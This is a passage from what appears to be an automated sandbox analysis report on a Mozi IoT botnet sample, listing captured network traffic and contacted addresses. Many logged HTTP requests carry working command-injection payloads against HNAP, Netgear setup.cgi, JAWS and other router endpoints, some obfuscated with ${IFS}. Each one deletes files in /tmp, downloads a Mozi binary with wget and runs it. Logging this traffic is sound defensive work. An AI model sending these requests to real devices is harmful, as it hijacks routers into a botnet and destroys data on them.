68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.110.194.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.3.84.96:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.36.171.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.13.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Sample listens on a socket
Source: /tmp/nT7K5GG5km (PID: 4623) Socket: 0.0.0.0::44040 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 173.128.113.111
Source: unknown TCP traffic detected without corresponding DNS query: 151.70.88.212
Source: unknown TCP traffic detected without corresponding DNS query: 37.127.116.2
Source: unknown TCP traffic detected without corresponding DNS query: 73.213.225.252
Source: unknown TCP traffic detected without corresponding DNS query: 164.95.80.124
Source: unknown TCP traffic detected without corresponding DNS query: 3.220.46.172
Source: unknown TCP traffic detected without corresponding DNS query: 65.119.165.128
Source: unknown TCP traffic detected without corresponding DNS query: 159.30.196.217
Source: unknown TCP traffic detected without corresponding DNS query: 112.60.138.223
Source: unknown TCP traffic detected without corresponding DNS query: 54.72.49.99
Source: unknown TCP traffic detected without corresponding DNS query: 159.134.45.88
Source: unknown TCP traffic detected without corresponding DNS query: 169.108.151.225
Source: unknown TCP traffic detected without corresponding DNS query: 46.69.243.160
Source: unknown TCP traffic detected without corresponding DNS query: 159.184.117.36
Source: unknown TCP traffic detected without corresponding DNS query: 45.71.81.134
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.196.152
Source: unknown TCP traffic detected without corresponding DNS query: 187.65.235.163
Source: unknown TCP traffic detected without corresponding DNS query: 133.182.208.68
Source: unknown TCP traffic detected without corresponding DNS query: 105.202.173.103
Source: unknown TCP traffic detected without corresponding DNS query: 192.37.11.14
Source: unknown TCP traffic detected without corresponding DNS query: 128.34.103.41
Source: unknown TCP traffic detected without corresponding DNS query: 65.169.70.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.146.156.163
Source: unknown TCP traffic detected without corresponding DNS query: 96.200.64.71
Source: unknown TCP traffic detected without corresponding DNS query: 122.157.60.54
Source: unknown TCP traffic detected without corresponding DNS query: 99.231.44.225
Source: unknown TCP traffic detected without corresponding DNS query: 88.83.215.123
Source: unknown TCP traffic detected without corresponding DNS query: 112.188.233.56
Source: unknown TCP traffic detected without corresponding DNS query: 106.180.217.144
Source: unknown TCP traffic detected without corresponding DNS query: 177.228.76.105
Source: unknown TCP traffic detected without corresponding DNS query: 196.250.243.57
Source: unknown TCP traffic detected without corresponding DNS query: 80.6.216.131
Source: unknown TCP traffic detected without corresponding DNS query: 151.160.250.99
Source: unknown TCP traffic detected without corresponding DNS query: 141.215.180.231
Source: unknown TCP traffic detected without corresponding DNS query: 18.21.159.227
Source: unknown TCP traffic detected without corresponding DNS query: 53.12.181.226
Source: unknown TCP traffic detected without corresponding DNS query: 72.240.24.193
Source: unknown TCP traffic detected without corresponding DNS query: 168.237.187.123
Source: unknown TCP traffic detected without corresponding DNS query: 60.222.236.176
Source: unknown TCP traffic detected without corresponding DNS query: 45.220.233.11
Source: unknown TCP traffic detected without corresponding DNS query: 54.48.115.122
Source: unknown TCP traffic detected without corresponding DNS query: 65.123.42.165
Source: unknown TCP traffic detected without corresponding DNS query: 188.61.141.250
Source: unknown TCP traffic detected without corresponding DNS query: 189.51.61.124
Source: unknown TCP traffic detected without corresponding DNS query: 99.79.97.187
Source: unknown TCP traffic detected without corresponding DNS query: 82.32.209.151
Source: unknown TCP traffic detected without corresponding DNS query: 111.39.224.122
Source: unknown TCP traffic detected without corresponding DNS query: 54.139.218.167
Source: unknown TCP traffic detected without corresponding DNS query: 218.150.197.195
Source: unknown TCP traffic detected without corresponding DNS query: 111.99.121.168
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 112.125.239.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 147.46.176.166:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.22.17.236:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 1.34.1.251:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 46.249.83.253:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.109.201.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 89.129.183.215:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.106.17.156:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: unknown HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 